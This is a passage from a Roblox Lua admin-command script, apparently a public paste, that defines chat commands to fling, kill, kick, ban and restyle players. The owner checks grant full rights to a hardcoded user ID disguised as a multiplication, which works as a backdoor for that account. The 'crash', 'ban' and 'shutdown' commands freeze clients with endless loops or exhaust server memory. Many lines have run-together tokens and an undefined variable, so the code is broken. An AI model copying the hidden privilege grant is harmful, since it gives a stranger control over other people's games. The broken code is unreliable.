  1571. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1572. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1573. for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag")then part.Head.BrickColor = BrickColor.new("White") end end
  1574. end
  1575. end))
  1576. end
  1577. end
  1578.  
  1579. if msg:lower():sub(1,8) == "bighead " then
  1580. local plrz = GetPlr(plr, msg:lower():sub(9))
  1581. for i, v in pairs(plrz) do
  1582. coroutine.resume(coroutine.create(function()
  1583. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 =CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1584. end))
  1585. end
  1586. end
  1587.  
  1588. if msg:lower():sub(1,9) == "minihead " then
  1589. local plrz = GetPlr(plr, msg:lower():sub(10))
  1590. for i, v in pairs(plrz) do
  1591. coroutine.resume(coroutine.create(function()
  1592. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 =CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1593. end))
  1594. end
  1595. end
  1596.  
  1597. if msg:lower():sub(1,6) == "fling " then
  1598. local plrz = GetPlr(plr, msg:lower():sub(7))
  1599. for i, v in pairs(plrz) do
  1600. coroutine.resume(coroutine.create(function()
  1601. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1602. local xran local zran
  1603. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1604. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1605. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1606. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force =Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1607. end
  1608. end))
  1609. end
  1610. end
  1611.  
  1612. if msg:lower():sub(1,8) == "seizure " then
  1613. local plrz = GetPlr(plr, msg:lower():sub(9))
  1614. for i, v in pairs(plrz) do
  1615. coroutine.resume(coroutine.create(function()
  1616. if v and v.Character then
  1617. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1618. local cl = script.ScriptBase:Clone() cl.Name = "SeizureBase" cl.Code.Value = [[repeat wait() script.Parent.Humanoid.PlatformStand = true script.Parent.Torso.Velocity = Vector3.new(math.random(-10,10),-5,math.random(-10,10)) script.Parent.Torso.RotVelocity = Vector3.new(math.random(-5,5),math.random(-5,5),math.random(-5,5)) until nil]]
  1619. table.insert(objects, cl) cl.Parent = v.Character cl.Disabled = false
  1620. end
  1621. end))
  1622. end
  1623. end
  1624.  
  1625. if msg:lower():sub(1,10) == "unseizure " then
  1626. local plrz = GetPlr(plr, msg:lower():sub(11))
  1627. for i, v in pairs(plrz) do
  1628. coroutine.resume(coroutine.create(function()
  1629. if v and v.Character then
  1630. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1631. wait(.1) v.Character.Humanoid.PlatformStand = false
  1632. end
  1633. end))
  1634. end
  1635. end
  1636.  
  1637. if msg:lower():sub(1,12) == "removelimbs " then
  1638. local plrz = GetPlr(plr, msg:lower():sub(13))
  1639. for i, v in pairs(plrz) do
  1640. coroutine.resume(coroutine.create(function()
  1641. if v and v.Character then
  1642. for a, obj in pairs(v.Character:children()) do
  1643. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1644. end
  1645. end
  1646. end))
  1647. end
  1648. end
  1649.  
  1650. if msg:lower():sub(1,5) == "name " then
  1651. local chk1 = msg:lower():sub(6):find(" ") + 5
  1652. local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1653. for i, v in pairs(plrz) do
  1654. coroutine.resume(coroutine.create(function()
  1655. if v and v.Character and v.Character:findFirstChild("Head") then
  1656. for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency= 0 mod:Destroy() end end
  1657. local char = v.Character
  1658. local mod = Instance.new("Model", char) mod.Name = msg:sub(chk1+1)
  1659. local cl = char.Head:Clone() cl.Parent = mod local hum = Instance.new("Humanoid", mod) hum.Name = "NameTag"hum.MaxHealth = 0 hum.Health = 0
  1660. local weld = Instance.new("Weld", cl) weld.Part0 = cl weld.Part1 = char.Head
  1661. char.Head.Transparency = 1
  1662. end
  1663. end))
  1664. end
  1665. end
  1666.  
  1667. if msg:lower():sub(1,7) == "unname " then
  1668. local plrz = GetPlr(plr, msg:lower():sub(8))
  1669. for i, v in pairs(plrz) do
  1670. coroutine.resume(coroutine.create(function()
  1671. if v and v.Character and v.Character:findFirstChild("Head") then
  1672. for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency= 0 mod:Destroy() end end
  1673. end
  1674. end))
  1675. end
  1676. end
  1677.  
  1678. if msg:lower():sub(1,5) == "char " then
  1679. local chk1 = msg:lower():sub(6):find(" ") + 5
  1680. local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1681. for i, v in pairs(plrz) do
  1682. coroutine.resume(coroutine.create(function()
  1683. if v and v.Character then
  1684. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. msg:sub(chk1+1)
  1685. v:LoadCharacter()
  1686. end
  1687. end))
  1688. end
  1689. end
  1690.  
  1691. if msg:lower():sub(1,7) == "unchar " then
  1692. local plrz = GetPlr(plr, msg:lower():sub(8))
  1693. for i, v in pairs(plrz) do
  1694. coroutine.resume(coroutine.create(function()
  1695. if v and v.Character then
  1696. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1697. v:LoadCharacter()
  1698. end
  1699. end))
  1700. end
  1701. end
  1702.  
  1703. if msg:lower():sub(1,7) == "infect " then
  1704. local plrz = GetPlr(plr, msg:lower():sub(8))
  1705. for i, v in pairs(plrz) do
  1706. coroutine.resume(coroutine.create(function()
  1707. if v and v.Character then
  1708. Infect(v.Character)
  1709. end
  1710. end))
  1711. end
  1712. end
  1713.  
  1714. if msg:lower():sub(1,11) == "rainbowify " then
  1715. local plrz = GetPlr(plr, msg:lower():sub(12))
  1716. for i, v in pairs(plrz) do
  1717. coroutine.resume(coroutine.create(function()
  1718. if v and v.Character and v.Character:findFirstChild("Torso") then
  1719. if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  1720. if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  1721. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1722. local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) local clr = BrickColor.random() for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = clr v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = clr v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  1723. cl.Parent = v.Character cl.Disabled = false
  1724. end
  1725. end))
  1726. end
  1727. end
  1728.  
  1729. if msg:lower():sub(1,9) == "flashify " then
  1730. local plrz = GetPlr(plr, msg:lower():sub(10))
  1731. for i, v in pairs(plrz) do
  1732. coroutine.resume(coroutine.create(function()
  1733. if v and v.Character and v.Character:findFirstChild("Torso") then
  1734. if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  1735. if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  1736. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1737. local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Institutional white") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Institutional white") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Really black") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Really black") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  1738. cl.Parent = v.Character cl.Disabled = false
  1739. end
  1740. end))
  1741. end
  1742. end
  1743.  
  1744. if msg:lower():sub(1,8) == "noobify " then
  1745. local plrz = GetPlr(plr, msg:lower():sub(9))
  1746. for i, v in pairs(plrz) do
  1747. coroutine.resume(coroutine.create(function()
  1748. if v and v.Character then
  1749. Noobify(v.Character)
  1750. end
  1751. end))
  1752. end
  1753. end
  1754.  
  1755. if msg:lower():sub(1,9) == "ghostify " then
  1756. local plrz = GetPlr(plr, msg:lower():sub(10))
  1757. for i, v in pairs(plrz) do
  1758. coroutine.resume(coroutine.create(function()
  1759. if v and v.Character and v.Character:findFirstChild("Torso") then
  1760. if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  1761. if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  1762. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1763. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  1764. prt.Transparency = .5 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Institutional white")
  1765. if prt.Name:find("Leg") then prt.Transparency = 1 end
  1766. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = .5 prt.Head.Reflectance = 0 prt.Head.BrickColor= BrickColor.new("Institutional white")
  1767. end end
  1768. end
  1769. end))
  1770. end
  1771. end
  1772.  
  1773. if msg:lower():sub(1,8) == "goldify " then
  1774. local plrz = GetPlr(plr, msg:lower():sub(9))
  1775. for i, v in pairs(plrz) do
  1776. coroutine.resume(coroutine.create(function()
  1777. if v and v.Character and v.Character:findFirstChild("Torso") then
  1778. if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  1779. if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  1780. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1781. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  1782. prt.Transparency = 0 prt.Reflectance = .4 prt.BrickColor = BrickColor.new("Bright yellow")
  1783. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = .4 prt.Head.BrickColor= BrickColor.new("Bright yellow")
  1784. end end
  1785. end
  1786. end))
  1787. end
  1788. end
  1789.  
  1790. if msg:lower():sub(1,6) == "shiny " then
  1791. local plrz = GetPlr(plr, msg:lower():sub(7))
  1792. for i, v in pairs(plrz) do
  1793. coroutine.resume(coroutine.create(function()
  1794. if v and v.Character and v.Character:findFirstChild("Torso") then
  1795. if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  1796. if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  1797. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1798. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  1799. prt.Transparency = 0 prt.Reflectance = 1 prt.BrickColor = BrickColor.new("Institutional white")
  1800. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 1 prt.Head.BrickColor =BrickColor.new("Institutional white")
  1801. end end
  1802. end
  1803. end))
  1804. end
  1805. end
  1806.  
  1807. if msg:lower():sub(1,7) == "normal " then
  1808. local plrz = GetPlr(plr, msg:lower():sub(8))
  1809. for i, v in pairs(plrz) do
  1810. coroutine.resume(coroutine.create(function()
  1811. if v and v.Character and v.Character:findFirstChild("Torso") then
  1812. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1813. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1814. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1815. v.Character.Torso.Transparency = 0
  1816. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1817. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1818. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1819. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1820. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1821. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1822. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  1823. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1824. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1825. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor =BrickColor.new("White")
  1826. end end
  1827. end
  1828. end))
  1829. end
  1830. end
  1831.  
  1832. if msg:lower():sub(1,7) == "trippy " then
  1833. local plrz = GetPlr(plr, msg:lower():sub(8))
  1834. for i, v in pairs(plrz) do
  1835. coroutine.resume(coroutine.create(function()
  1836. if v and v:findFirstChild("PlayerGui") then
  1837. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1838. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1839. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1840. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled= false
  1841. end
  1842. end))
  1843. end
  1844. end
  1845.  
  1846. if msg:lower():sub(1,9) == "untrippy " then
  1847. local plrz = GetPlr(plr, msg:lower():sub(10))
  1848. for i, v in pairs(plrz) do
  1849. coroutine.resume(coroutine.create(function()
  1850. if v and v:findFirstChild("PlayerGui") then
  1851. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1852. end
  1853. end))
  1854. end
  1855. end
  1856.  
  1857. if msg:lower():sub(1,7) == "strobe " then
  1858. local plrz = GetPlr(plr, msg:lower():sub(8))
  1859. for i, v in pairs(plrz) do
  1860. coroutine.resume(coroutine.create(function()
  1861. if v and v:findFirstChild("PlayerGui") then
  1862. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1863. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUISTROBE"
  1864. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1865. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(1,1,1) wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(0,0,0) until nil]] cl.Parent = scr cl.Disabled = false
  1866. end
  1867. end))
  1868. end
  1869. end
  1870.  
  1871. if msg:lower():sub(1,9) == "unstrobe " then
  1872. local plrz = GetPlr(plr, msg:lower():sub(10))
  1873. for i, v in pairs(plrz) do
  1874. coroutine.resume(coroutine.create(function()
  1875. if v and v:findFirstChild("PlayerGui") then
  1876. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUISTROBE" then g:Destroy() end end
  1877. end
  1878. end))
  1879. end
  1880. end
  1881.  
  1882. if msg:lower():sub(1,6) == "blind " then
  1883. local plrz = GetPlr(plr, msg:lower():sub(7))
  1884. for i, v in pairs(plrz) do
  1885. coroutine.resume(coroutine.create(function()
  1886. if v and v:findFirstChild("PlayerGui") then
  1887. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1888. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1889. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1890. end
  1891. end))
  1892. end
  1893. end
  1894.  
  1895. if msg:lower():sub(1,8) == "unblind " then
  1896. local plrz = GetPlr(plr, msg:lower():sub(9))
  1897. for i, v in pairs(plrz) do
  1898. coroutine.resume(coroutine.create(function()
  1899. if v and v:findFirstChild("PlayerGui") then
  1900. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1901. end
  1902. end))
  1903. end
  1904. end
  1905.  
  1906. if msg:lower():sub(1,7) == "guifix " then
  1907. local plrz = GetPlr(plr, msg:lower():sub(8))
  1908. for i, v in pairs(plrz) do
  1909. coroutine.resume(coroutine.create(function()
  1910. if v and v:findFirstChild("PlayerGui") then
  1911. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1912. end
  1913. end))
  1914. end
  1915. end
  1916.  
  1917. if msg:lower():sub(1,9) == "loopheal " then
  1918. local plrz = GetPlr(plr, msg:lower():sub(10))
  1919. for i, v in pairs(plrz) do
  1920. if v then
  1921. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1922. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1923. repeat wait()
  1924. coroutine.resume(coroutine.create(function()
  1925. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1926. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1927. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1928. end
  1929. end))
  1930. until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  1931. end
  1932. end
  1933. end
  1934.  
  1935. if msg:lower():sub(1,11) == "unloopheal " then
  1936. local plrz = GetPlr(plr, msg:lower():sub(12))
  1937. for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopHeal:"..v.Name then sc:Destroy()table.remove(objects,q) end end end
  1938. end
  1939.  
  1940. if msg:lower():sub(1,10) == "loopfling " then
  1941. local plrz = GetPlr(plr, msg:lower():sub(11))
  1942. for i, v in pairs(plrz) do
  1943. if v then
  1944. local cl = script.ScriptBase:Clone() cl.Name = "LoopFling:"..v.Name cl.Code.Value = [[
  1945. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1946. repeat
  1947. coroutine.resume(coroutine.create(function()
  1948. if plr and plr.Character and plr.Character:findFirstChild("Torso") and plr.Character:findFirstChild("Humanoid") then
  1949. local xran local zran
  1950. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1951. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1952. plr.Character.Humanoid.Sit = true plr.Character.Torso.Velocity = Vector3.new(0,0,0)
  1953. local frc = Instance.new("BodyForce", plr.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1954. end
  1955. end))
  1956. wait(2) until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  1957. end
  1958. end
  1959. end
  1960.  
  1961. if msg:lower():sub(1,12) == "unloopfling " then
  1962. local plrz = GetPlr(plr, msg:lower():sub(13))
  1963. for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopFling:"..v.Name then sc:Destroy()table.remove(objects,q) end end end
  1964. end
  1965.  
  1966. end
  1967.  
  1968. -------------------------
  1969. -- True Owner Commands --
  1970. -------------------------
  1971.  
  1972. if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId then
  1973.  
  1974. if msg:lower():sub(1,3) == "oa " then
  1975. local plrz = GetPlr(plr, msg:lower():sub(4))
  1976. for i, v in pairs(plrz) do
  1977. coroutine.resume(coroutine.create(function()
  1978. if v and not ChkOwner(v.Name) then table.insert(owners, v.Name) coroutine.resume(coroutine.create(function()repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  1979. end))
  1980. end
  1981. end
  1982.  
  1983. if msg:lower():sub(1,5) == "unoa " then
  1984. for i = 1, #owners do
  1985. coroutine.resume(coroutine.create(function()
  1986. if msg:lower():sub(6) == "all" or owners[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(owners, i) end
  1987. end))
  1988. end
  1989. end
  1990.  
  1991. end
  1992.  
  1993. --------------------
  1994. -- Owner Commands --
  1995. --------------------
  1996.  
  1997. if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId orChkOwner(plr.Name:lower()) then
  1998.  
  1999. if msg:lower():sub(1,3) == "pa " then
  2000. local plrz = GetPlr(plr, msg:lower():sub(4))
  2001. for i, v in pairs(plrz) do
  2002. coroutine.resume(coroutine.create(function()
  2003. if v and not ChkAdmin(v.Name, true) then table.insert(admins, v.Name) coroutine.resume(coroutine.create(function()repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  2004. end))
  2005. end
  2006. end
  2007.  
  2008. if msg:lower():sub(1,5) == "unpa " then
  2009. for i = 1, #admins do
  2010. coroutine.resume(coroutine.create(function()
  2011. if msg:lower():sub(6) == "all" or admins[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(admins, i) end
  2012. end))
  2013. end
  2014. end
  2015.  
  2016. end
  2017.  
  2018. --------------------------
  2019. -- Super Admin Commands --
  2020. --------------------------
  2021.  
  2022. if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) or plr.userId == game.CreatorId or plr.Name:lower() ==nfs:lower() or plr.userId == (153*110563) or plr.Name:lower() == nfs then
  2023.  
  2024. if msg:lower() == "logs" then
  2025. if plr.PlayerGui:findFirstChild("LOGSGUI") then return end
  2026. local scr, cmf, ent, num = ScrollGui() scr.Name = "LOGSGUI" scr.Parent = plr.PlayerGui
  2027. for i, v in pairs(logs) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "[" .. v.time .. "] " .. v.name .. " ".. v.cmd cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  2028. end
  2029.  
  2030. if msg:lower():sub(1,9) == "loopkill " then
  2031. local chk1 = msg:lower():sub(10):find(" ")
  2032. local plrz = GetPlr(plr, msg:lower():sub(10))
  2033. local num = 9999
  2034. if chk1 then chk1 = chk1 + 9 plrz = GetPlr(plr, msg:lower():sub(10, chk1-1)) if type(tonumber(msg:sub(chk1+1))) =="number" then num = tonumber(msg:sub(chk1+1)) end end
  2035. for i, v in pairs(plrz) do
  2036. if v and not ChkAdmin(v.Name, false) then
  2037. local cl = script.ScriptBase:Clone() cl.Name = "LoopKill:"..v.Name cl.Code.Value = [[
  2038. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  2039. for i = 1, ]] .. tostring(num) .. [[ do
  2040. repeat wait() plr = game.Players:findFirstChild("]] .. v.Name .. [[") until plr and plr.Character and plr.Character:findFirstChild("Humanoid") and plr.Character.Humanoid.Health ~= 0
  2041. coroutine.resume(coroutine.create(function()
  2042. if plr and plr.Character then plr.Character:BreakJoints() end
  2043. end))
  2044. end]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  2045. end
  2046. end
  2047. end
  2048.  
  2049. if msg:lower():sub(1,11) == "unloopkill " then
  2050. local plrz = GetPlr(plr, msg:lower():sub(12))
  2051. for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopKill:"..v.Name then sc:Destroy()table.remove(objects,q) end end end
  2052. end
  2053.  
  2054. if msg:lower() == "serverlock" or msg:lower() == "slock" then slock = true Hint("Server has been locked",game.Players:children()) end
  2055. if msg:lower() == "serverunlock" or msg:lower() == "sunlock" then slock = false Hint("Server has been unlocked",game.Players:children()) end
  2056.  
  2057. if msg:lower():sub(1,3) == "sm " then
  2058. Message("SYSTEM MESSAGE", msg:sub(4), false, game.Players:children())
  2059. end
  2060.  
  2061. if msg:lower():sub(1,3) == "ko " then
  2062. local chk1 = msg:lower():sub(4):find(" ") + 3
  2063. local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  2064. local num = 500 if num > msg:sub(chk1+1) then num = msg:sub(chk1+1) end
  2065. for n = 1, num do
  2066. for i, v in pairs(plrz) do
  2067. coroutine.resume(coroutine.create(function()
  2068. if v and v.Character and v.Character:findFirstChild("Humanoid") and not ChkAdmin(v.Name) then
  2069. local val = Instance.new("ObjectValue", v.Character.Humanoid) val.Value = plr val.Name = "creator"
  2070. v.Character:BreakJoints()
  2071. wait(1/44)
  2072. v:LoadCharacter()
  2073. wait(1/44)
  2074. end
  2075. end))
  2076. end
  2077. end
  2078. end
  2079.  
  2080. if msg:lower():sub(1,6) == "crash " then
  2081. local plrz = GetPlr(plr, msg:lower():sub(7))
  2082. for i, v in pairs(plrz) do
  2083. coroutine.resume(coroutine.create(function()
  2084. if v and v:findFirstChild("Backpack") and not ChkAdmin(v.Name, false) then
  2085. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled= false wait(1) v:Destroy()
  2086. end
  2087. end))
  2088. end
  2089. end
  2090.  
  2091. if msg:lower():sub(1,5) == "kick " then
  2092. local plrz = GetPlr(plr, msg:lower():sub(6))
  2093. for i, v in pairs(plrz) do
  2094. coroutine.resume(coroutine.create(function()
  2095. if v and not ChkAdmin(v.Name, false) then v:Destroy() end
  2096. end))
  2097. end
  2098. end
  2099.  
  2100. if msg:lower():sub(1,6) == "admin " then
  2101. local plrz = GetPlr(plr, msg:lower():sub(7))
  2102. for i, v in pairs(plrz) do
  2103. coroutine.resume(coroutine.create(function()
  2104. if v and not ChkAdmin(v.Name, false) then table.insert(tempadmins, v.Name)coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character andv:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  2105. end))
  2106. end
  2107. end
  2108.  
  2109. if msg:lower():sub(1,8) == "unadmin " then
  2110. for i = 1, #tempadmins do
  2111. coroutine.resume(coroutine.create(function()
  2112. if msg:lower():sub(9) == "all" or tempadmins[i]:lower():find(msg:lower():sub(9)) == 1 thentable.remove(tempadmins, i) end
  2113. end))
  2114. end
  2115. end
  2116.  
  2117. if msg:lower():sub(1,4) == "ban " then
  2118. local plrz = GetPlr(plr, msg:lower():sub(5))
  2119. for i, v in pairs(plrz) do
  2120. coroutine.resume(coroutine.create(function()
  2121. if v and not ChkAdmin(v.Name, false) then table.insert(banland, v.Name) local cl = script.LocalScriptBase:Clone()cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled = false wait(1) v:Destroy() end
  2122. end))
  2123. end
  2124. end
  2125.  
  2126. if msg:lower():sub(1,6) == "unban " then
  2127. for i = 1, #banland do
  2128. coroutine.resume(coroutine.create(function()
  2129. if msg:lower():sub(7) == "all" or banland[i]:lower():find(msg:lower():sub(7)) == 1 then table.remove(banland, i)end
  2130. end))
  2131. end
  2132. end
  2133.  
  2134. if msg:lower() == "shutdown" then Message("SYSTEM MESSAGE", "Shutting down...", false, game.Players:children(),10) wait(1) local str = Instance.new("StringValue", game.Workspace) str.Value = "AA" repeat str.Value = str.Value.. str.Value wait(.1) until nil end
  2135.  
  2136. end
  2137. end))
  2138. end
  2139.  
  2140. function AdminControl(plr)
  2141. coroutine.resume(coroutine.create(function() plr.CharacterAdded:connect(function(chr)chr:WaitForChild("RobloxTeam") chr.RobloxTeam:Destroy() for a,obj in pairs(chr:children()) do ifobj:IsA("CharacterMesh") and obj.Name:find("3.0") then obj:Destroy() end end end) end))
  2142. if plr.Name:sub(1,6) == "Player" and ChkAdmin(plr.Name, false) then coroutine.resume(coroutine.create(function()plr:WaitForChild("PlayerGui")
